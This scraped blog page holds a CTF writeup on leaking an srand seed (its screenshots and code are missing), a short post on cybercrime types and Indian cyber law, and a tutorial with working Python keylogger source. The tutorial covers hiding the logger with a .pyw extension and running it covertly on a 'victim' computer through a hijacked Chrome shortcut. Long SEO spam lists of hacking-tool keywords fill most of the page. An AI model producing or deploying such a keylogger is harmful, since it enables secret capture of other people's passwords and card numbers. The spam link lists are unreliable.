Monday, August 31, 2020

ASIS CTF Quals 2015 - Sawthis Writeup - Srand Remote Prediction


The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()


If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.




The macro:



















Related posts

  1. Pentest Tools
  2. Hack Tools Mac
  3. Pentest Tools Subdomain
  4. Hack Tools Download
  5. Pentest Tools Review
  6. Hacking Tools And Software
  7. Hacker Tools Online
  8. Wifi Hacker Tools For Windows
  9. Hacking Tools For Games
  10. Hacking Tools For Windows Free Download
  11. Pentest Tools List
  12. Hacker Tools Windows
  13. Hacking Tools 2020
  14. Tools 4 Hack
  15. Hacking Tools Windows
  16. Computer Hacker
  17. Android Hack Tools Github
  18. Hacker Tools Free Download
  19. Pentest Tools Linux
  20. Pentest Tools
  21. Underground Hacker Sites
  22. Kik Hack Tools
  23. How To Hack
  24. Hacking Tools Name
  25. Hacker Tools 2020
  26. Top Pentest Tools
  27. Pentest Tools Url Fuzzer
  28. Hacks And Tools
  29. Hacking Tools For Windows 7
  30. Hacker Search Tools
  31. Easy Hack Tools
  32. Pentest Box Tools Download
  33. Hacking Tools Kit
  34. Hack Tools Download
  35. Pentest Tools Review
  36. Pentest Automation Tools
  37. Hacker Tools Mac
  38. Hacker Tools For Ios
  39. Pentest Tools Website Vulnerability
  40. Hack Tools For Pc
  41. Hack Tools 2019
  42. Hack Tools For Pc
  43. Pentest Tools Website Vulnerability
  44. Hack App
  45. Pentest Tools Github
  46. Hacking Tools For Windows 7
  47. Hack Website Online Tool
  48. Hacking Apps
  49. Hak5 Tools
  50. Hacking Tools 2019
  51. Github Hacking Tools
  52. Nsa Hack Tools Download
  53. Hacker Techniques Tools And Incident Handling
  54. Hack Tool Apk No Root
  55. Pentest Tools Alternative
  56. Hacking Tools Free Download
  57. Pentest Tools Bluekeep
  58. Pentest Tools Github
  59. Growth Hacker Tools
  60. Beginner Hacker Tools
  61. Hacker Tools Apk Download
  62. Pentest Tools For Ubuntu
  63. World No 1 Hacker Software
  64. Growth Hacker Tools
  65. Hacking Tools For Windows Free Download
  66. World No 1 Hacker Software
  67. Usb Pentest Tools
  68. Hacking Tools Online
  69. Hacker Security Tools
  70. Android Hack Tools Github
  71. Hacker Tools For Ios
  72. Pentest Tools For Ubuntu
  73. Hack Tools For Windows
  74. Easy Hack Tools
  75. Hacking Tools Windows
  76. Hack Website Online Tool
  77. Pentest Tools Subdomain
  78. Hacker Tools Mac
  79. Pentest Tools Framework
  80. Hacker Tools Linux
  81. Pentest Tools Port Scanner
  82. Pentest Tools Website
at Mbozi, Mbeya. 1 comment:

Sunday, August 30, 2020

What Is Cybercrime? What Are The Types Of Cybercrime? What Is Cyberlaw In India?

What is cyber crime?

Cybercrime is the use of computers & networks to perform illegal activities such as spreading viruses,online  bullying,performing unauthorized electronic fund transfers etc. Most cyber crimes are committed through the internet.
Some cyber crime also be carried out using mobile phones via Sms and online chatting applications.

TYPES OF CYBERCRIME

The following list presents the common types of cybercrimes-

1-Computer Fraud-Intential deception for personal gain via the use of computer system.

2-Privacy Violations-Exposing personal information such as email addresses,phone numbers,account details etc, on social media,websites,etc.

3-Identity theft-Stealing personal information from somebody and impersonating that person.

4-Sharing copyright files/information-This involves distributing copyright protected files such as eBooks and computer program etc.

5-Electronic funds transfer-This involves gaining an unauthorized access to bank computer networks and making illegal funds transferring.

6-Electronic money laundering-This involves the use of the computer to launder money.

7-Atm fraud-This involves intercepting ATM card details such as account numbers and PIN numbers.These details are then used to withdraw funds from the intercepted accounts.

8-Denial of service attack-This involves the use of computers in multiple locations to attack servers with a view of shutting them down.

9-Spam:sending unauthorized emails.
These emails usually contain advertisements.


CYBER LAW

Under The Information Technology Act,2000 
CHAPTER XI-OFFENCES-66. Hacking with computer system.

1-whoever with the Intent to cause or knowing that he is likely to cause Wrongfull Loss or Damage to the public or any person Destroys or Deletes or Alter any Information Residing in computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

2-whoever commits hacking shell be punished with imprisonment up to three years, or  with fine which may extend up to two lakh rupees,or with both.
More information

  1. Hack Tools Download
  2. Pentest Box Tools Download
  3. Hack Tools For Pc
  4. Hacker Tools Apk Download
  5. Android Hack Tools Github
  6. Hack And Tools
  7. Hacking Tools Free Download
  8. Blackhat Hacker Tools
  9. Hacking Tools For Mac
  10. Pentest Tools Tcp Port Scanner
  11. Pentest Tools List
  12. Hacker Tools Github
  13. Pentest Tools Review
  14. Hacking Tools For Windows Free Download
  15. Bluetooth Hacking Tools Kali
  16. Hacking Tools For Beginners
  17. Hacker Hardware Tools
  18. Android Hack Tools Github
  19. Pentest Recon Tools
  20. Hacking Tools For Windows
  21. Black Hat Hacker Tools
  22. Hacker Tools For Mac
  23. Hack Tools For Ubuntu
  24. Hacker Tool Kit
  25. Pentest Tools Port Scanner
  26. Physical Pentest Tools
  27. Hacking Tools For Games
  28. Hacking App
  29. Pentest Tools Github
  30. Pentest Tools Download
  31. Ethical Hacker Tools
  32. Hacker Tools Free Download
  33. Pentest Tools For Android
  34. Pentest Recon Tools
  35. Hack Tool Apk No Root
  36. Pentest Recon Tools
  37. Hacker Tools Online
  38. Hacking Tools Usb
  39. Hack Tools For Mac
  40. Hacking App
  41. Pentest Tools Open Source
  42. Hacking Tools For Beginners
  43. Pentest Tools Review
  44. Tools For Hacker
  45. Hacking Tools For Windows
  46. Pentest Tools
  47. Hacker Tools 2019
  48. Best Hacking Tools 2020
  49. Hacking Tools For Pc
  50. Hacking Tools Pc
  51. Pentest Tools Online
  52. Ethical Hacker Tools
  53. Best Hacking Tools 2019
  54. Pentest Tools Website Vulnerability
  55. Hak5 Tools
  56. Hak5 Tools
  57. Hack Tools Github
  58. Hacker Tools 2019
  59. Nsa Hacker Tools
  60. Hack Tools Mac
  61. Hack Tools
  62. Hacking Tools For Windows 7
  63. Pentest Box Tools Download
  64. Hacking Tools For Mac
  65. Hacking Tools Windows
  66. Hack Tools For Pc
  67. Pentest Tools For Ubuntu
  68. Hack Tools For Pc
  69. Black Hat Hacker Tools
  70. Hack Rom Tools
  71. Hacker Tools Free
  72. Hack Tools Pc
  73. Pentest Tools For Windows
  74. Best Hacking Tools 2019
  75. Pentest Tools For Windows
  76. Pentest Tools Alternative
  77. Hacking Tools Free Download
  78. Hack Tools For Windows
  79. Pentest Tools Kali Linux
  80. Hacking Tools For Windows
  81. Pentest Reporting Tools
  82. Hack And Tools
  83. Ethical Hacker Tools
  84. Free Pentest Tools For Windows
  85. Hacking Tools Pc
  86. Hacker Tools List
  87. Kik Hack Tools
  88. Hacking Tools For Windows 7
  89. Hacking Tools Download
  90. Wifi Hacker Tools For Windows
  91. Pentest Tools For Mac
  92. How To Hack
  93. Tools 4 Hack
  94. Hack Website Online Tool
  95. Hack Tools Online
  96. Hacking Tools 2019
  97. New Hack Tools
  98. Blackhat Hacker Tools
  99. Hack Tools Github
  100. Hacker Hardware Tools
  101. Hacking Tools Download
  102. Hacker Hardware Tools
  103. What Is Hacking Tools
  104. Hacking Tools Free Download
  105. Hacker Tools Linux
  106. Hack Tools For Windows
  107. Hacking Tools For Games
  108. Pentest Tools Online
  109. Hack Tools For Ubuntu
  110. Install Pentest Tools Ubuntu
  111. Easy Hack Tools
  112. Pentest Tools Download
  113. Github Hacking Tools
  114. Hack Tools Github
  115. Pentest Tools Download
  116. Hack Rom Tools
  117. Pentest Tools Website
  118. Beginner Hacker Tools
  119. Ethical Hacker Tools
  120. Hack Tools For Games
  121. Github Hacking Tools
  122. How To Hack
  123. Hacker Tools For Mac
  124. How To Make Hacking Tools
  125. Hacking Tools For Games
  126. Hacker Tools Linux
  127. Hack Tools For Mac
  128. Hacking Tools Free Download
  129. Hack Tools Github
  130. Hackers Toolbox
  131. Hacker Tools Apk
  132. Tools Used For Hacking
  133. Hacking Tools 2020
  134. Hack Tools For Mac
  135. Best Pentesting Tools 2018
  136. Hacker Tool Kit
  137. Hack Tool Apk No Root
  138. Pentest Tools For Ubuntu
  139. Black Hat Hacker Tools
  140. Kik Hack Tools
  141. Wifi Hacker Tools For Windows
  142. Pentest Tools For Android
  143. Hack Apps
  144. Android Hack Tools Github
  145. Hack Tools For Windows
  146. Pentest Tools Find Subdomains
at Mbozi, Mbeya. No comments:

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.

Related news


at Mbozi, Mbeya. 1 comment: